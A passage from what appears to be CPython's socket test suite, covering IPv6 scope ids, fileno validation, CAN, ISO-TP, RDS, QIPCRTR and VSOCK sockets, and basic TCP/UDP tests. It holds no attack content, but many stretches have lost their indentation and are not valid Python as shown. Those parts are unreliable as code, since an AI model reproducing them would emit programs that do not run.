        socket.IPPROTO_UDP
    )
    # Note missing interface name part in IPv6 address
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
    sys.platform == 'win32',
    'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
    """A numeric '%N' scope suffix is carried into the sockaddr scope id."""
    # Also works on Linux and Mac OS X, but is not documented (?)
    # Windows, Linux and Max OS X allow nonexistent interface numbers here.
    ifindex = 42
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D%' + str(ifindex),
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    # Note missing interface name part in IPv6 address
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
    """getnameinfo() renders the scope id as '%ifname' in numeric mode."""
    # Just pick up any network interface.
    (ifindex, test_interface) = socket.if_nameindex()[0]
    sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex)  # Note capital letter `D`.
    nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
    self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
                      'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
    """getnameinfo() renders a numeric scope id as '%N' in numeric mode."""
    # Also works on Linux (undocumented), but does not work on Mac OS X
    # Windows and Linux allow nonexistent interface numbers here.
    ifindex = 42
    sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex)  # Note capital letter `D`.
    nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
    self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
    """The family/type attributes stringify as enum members."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        self.assertEqual('AddressFamily.AF_INET', str(sock.family))
        self.assertEqual('SocketKind.SOCK_STREAM', str(sock.type))
def test_socket_consistent_sock_type(self):
    """socket.type stays SOCK_STREAM (flags like SOCK_NONBLOCK/
    SOCK_CLOEXEC stripped) across timeout/blocking mode changes."""
    SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
    SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
    sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
    with socket.socket(socket.AF_INET, sock_type) as s:
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.settimeout(1)
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.settimeout(0)
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.setblocking(True)
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.setblocking(False)
        self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
    """A socket constructed with unrecognized family/type values (via
    the fileno= path, which skips validation) reports them as plain ints."""
    # Test that when created with a family that's not one of the known
    # AF_*/SOCK_* constants, socket.family just returns the number.
    #
    # To do this we fool socket.socket into believing it already has an
    # open fd because on this path it doesn't actually verify the family and
    # type and populates the socket object.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    fd = sock.detach()
    unknown_family = max(socket.AddressFamily.__members__.values()) + 1
    # Exclude the flag members so the +1 really is an unknown kind.
    unknown_type = max(
        kind
        for name, kind in socket.SocketKind.__members__.items()
        if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
    ) + 1
    with socket.socket(
            family=unknown_family, type=unknown_type, proto=23,
            fileno=fd) as s:
        self.assertEqual(s.family, unknown_family)
        self.assertEqual(s.type, unknown_type)
        # some OS like macOS ignore proto
        self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
    """_sendfile_use_sendfile() fails cleanly for bad file objects:
    closed fd -> _GiveupOnSendfile, huge fd -> OverflowError,
    None fd -> TypeError."""
    class File:
        # Minimal file-like wrapper exposing only fileno().
        def __init__(self, fd):
            self.fd = fd
        def fileno(self):
            return self.fd
    with socket.socket() as sock:
        fd = os.open(os.curdir, os.O_RDONLY)
        os.close(fd)
        with self.assertRaises(socket._GiveupOnSendfile):
            sock._sendfile_use_sendfile(File(fd))
        with self.assertRaises(OverflowError):
            sock._sendfile_use_sendfile(File(2**1000))
        with self.assertRaises(TypeError):
            sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
    """Helper: rebuilding a socket from s.fileno() preserves family,
    type and fd; the original is detached to avoid a double close."""
    self.assertEqual(s.family, family)
    self.assertEqual(s.type, stype)
    fd = s.fileno()
    s2 = socket.socket(fileno=fd)
    self.addCleanup(s2.close)
    # detach old fd to avoid double close
    s.detach()
    self.assertEqual(s2.family, family)
    self.assertEqual(s2.type, stype)
    self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
# Round-trip socket.socket(fileno=...) for each address family that is
# available on this platform, using a freshly bound socket so that real
# kernel state sits behind the descriptor.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
# IPv6 sockaddr is (host, port, flowinfo, scope_id).
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
# Binding a UNIX socket may be forbidden (e.g. in a sandbox);
# silently skip this family in that case.
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
    """fileno=<float> must raise TypeError (no silent truncation)."""
    expected = "integer argument expected"
    with self.assertRaisesRegex(TypeError, expected):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
    """fileno=<str> (or any non-int) must raise TypeError."""
    expected = "integer is required"
    with self.assertRaisesRegex(TypeError, expected):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
    """fileno=-1 (the C-level 'invalid socket' marker) must raise."""
    expected = "negative file descriptor"
    with self.assertRaisesRegex(ValueError, expected):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
    """Any negative fileno, not just -1, must raise ValueError."""
    expected = "negative file descriptor"
    with self.assertRaisesRegex(ValueError, expected):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
    """A numerically valid but closed fd must raise EBADF (or
    WSAENOTSOCK on Windows), with or without explicit family/type."""
    WSAENOTSOCK = 10038  # Windows: descriptor is not a socket
    acceptable = (errno.EBADF, WSAENOTSOCK)
    with self.assertRaises(OSError) as cm:
        socket.socket(fileno=support.make_bad_fd())
    self.assertIn(cm.exception.errno, acceptable)
    with self.assertRaises(OSError) as cm:
        socket.socket(socket.AF_INET, socket.SOCK_STREAM,
                      fileno=support.make_bad_fd())
    self.assertIn(cm.exception.errno, acceptable)
def test_socket_fileno_requires_socket_fd(self):
    """An fd referring to a regular file (not a socket) must fail."""
    with tempfile.NamedTemporaryFile() as afile:
        # Without family/type the constructor probes the fd and fails
        # with some OSError.
        with self.assertRaises(OSError):
            socket.socket(fileno=afile.fileno())
        # With explicit family/type the error is pinned to ENOTSOCK.
        with self.assertRaises(OSError) as cm:
            socket.socket(socket.AF_INET, socket.SOCK_STREAM,
                          fileno=afile.fileno())
        self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
# Smoke tests for SocketCAN (AF_CAN): required constants exist, raw and
# BCM sockets can be created and bound, and the raw-socket options
# (loopback, filters) round-trip through get/setsockopt.
def testCrucialConstants(self):
# Bare attribute access: AttributeError here means CAN support is
# missing from this build.
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
# A raw CAN socket must be constructible.
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
# A broadcast-manager (BCM) datagram socket must be constructible.
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
# The empty interface name binds to all CAN interfaces.
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
# CAN_RAW_LOOPBACK must accept both 0 and 1 and report them back.
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
# A filter entry is struct can_filter: (can_id, can_mask), both u32.
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
# setsockopt() must also accept any bytes-like object.
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
# Threaded CAN tests: each testFoo runs on the server side while its
# _testFoo partner runs concurrently on the client side (framework
# convention of the ThreadedCANSocketTest base class).
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
# Pad the payload to the full 8 bytes; can_dlc records the real
# length. cls.can_frame_fmt is defined on the base class (not shown
# here) -- presumably the struct layout of linux struct can_frame.
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
# Inverse of build_can_frame(): strip the padding using can_dlc.
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
# recvfrom() on AF_CAN reports (interface_name, family).
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
# Maximum-size classic CAN payload: 8 bytes.
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
# Frame boundaries are preserved: two sends -> two receives, in order.
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
# Client side: receive the frame that testBCM's broadcast manager
# transmitted and check it round-trips through dissect_can_frame().
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
# Build a bcm_msg_head (see linux/can/bcm.h) requesting a single
# immediate transmission (TX_SEND) of exactly one frame; all the
# cyclic-transmission intervals are therefore zero.
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
    """Basic coverage for the CAN ISO-TP (ISO 15765-2) protocol."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Tests talk to a virtual CAN interface; testBind skips if it
        # does not exist on this machine.
        self.interface = "vcan0"

    def testCrucialConstants(self):
        # Merely touching these raises AttributeError if the build lacks
        # ISO-TP support.
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_ISOTP
        socket.SOCK_DGRAM

    def testCreateSocket(self):
        # A raw CAN socket must still be constructible.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW):
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
                         'socket.CAN_ISOTP required for this test.')
    def testCreateISOTPSocket(self):
        # An ISO-TP datagram socket must be constructible.
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM,
                           socket.CAN_ISOTP):
            pass

    def testTooLongInterfaceName(self):
        # IFNAMSIZ is typically 16; 1024 characters is safely over any
        # conceivable limit.
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM,
                           socket.CAN_ISOTP) as s:
            with self.assertRaisesRegex(OSError, 'interface name too long'):
                s.bind(('x' * 1024, 1, 2))

    def testBind(self):
        # Bind to (interface, rx_addr, tx_addr) and read the name back.
        try:
            with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM,
                               socket.CAN_ISOTP) as s:
                addr = (self.interface, 0x123, 0x456)
                s.bind(addr)
                self.assertEqual(s.getsockname(), addr)
        except OSError as e:
            if e.errno != errno.ENODEV:
                raise
            self.skipTest('network interface `%s` does not exist' %
                          self.interface)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
    """Smoke tests for Reliable Datagram Sockets (AF_RDS)."""

    def testCrucialConstants(self):
        # AttributeError here means the platform lacks RDS support.
        socket.AF_RDS
        socket.PF_RDS

    def testCreateSocket(self):
        # An RDS seqpacket socket must be constructible.
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0):
            pass

    def testSocketBufferSize(self):
        # Setting the kernel receive/send buffer sizes must be accepted.
        bufsize = 16384
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
            for opt in (socket.SO_RCVBUF, socket.SO_SNDBUF):
                s.setsockopt(socket.SOL_SOCKET, opt, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
# Threaded RDS tests: testFoo is the server half, _testFoo the client
# half, run concurrently by the ThreadedRDSSocketTest base class.
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
# Event available for cross-thread synchronisation if a test needs it.
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
# RDS reports the sender's bound address on receive.
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
# MSG_PEEK must leave the datagram queued for the next recvfrom().
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
# Datagram boundaries are preserved: two sends -> two receives,
# in order.
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
# The server socket must become readable once a datagram arrives.
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
                     'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
    """Smoke tests for the Qualcomm IPC router (AF_QIPCRTR) family."""

    def testCrucialConstants(self):
        socket.AF_QIPCRTR  # AttributeError if unsupported

    def testCreateSocket(self):
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM):
            pass

    def testUnbound(self):
        # A fresh socket reports port 0 until it is bound.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            self.assertEqual(s.getsockname()[1], 0)

    def testBindSock(self):
        # Binding on the socket's own node assigns a non-zero port.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            support.bind_port(s, host=s.getsockname()[0])
            self.assertNotEqual(s.getsockname()[1], 0)

    def testInvalidBindSock(self):
        # Binding to a negative node id must fail.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            self.assertRaises(OSError, support.bind_port, s, host=-2)

    def testAutoBindSock(self):
        # connect() auto-binds, so the local port becomes non-zero.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            s.connect((123, 123))
            self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
# Smoke tests for VM sockets (AF_VSOCK): required constants exist, a
# stream socket can be created, and the buffer-size options round-trip.
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
# AttributeError on any of these means incomplete VSOCK support.
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
# Read the current max/size/min buffer values...
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
# ...double each one (max is raised first so the others fit)...
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
# ...and verify the kernel reports the new values back.
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
# Core TCP behaviour over a connected pair of sockets. Each testFoo
# (server side, uses self.cli_conn) runs concurrently with its _testFoo
# partner (client side, uses self.serv_conn) -- framework convention of
# the SocketConnectedTest base class.
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
# Drain the stream until EOF; sendall() must have delivered all of it.
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
# The duplicate shares the connection, so it sees the sent data.
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
# The overflow variant reuses testShutdown as its server side; only the
# client half differs. cpython_only because it pokes at C int limits.
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
# Core UDP behaviour; testFoo (server) and _testFoo (client) run
# concurrently, per the ThreadedUDPSocketTest base-class convention.
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
# Send anyway so the client half has matching traffic.
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
# Event used by subclasses to synchronise the client and server
# threads (e.g. keeping a socket alive until the peer is done).
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
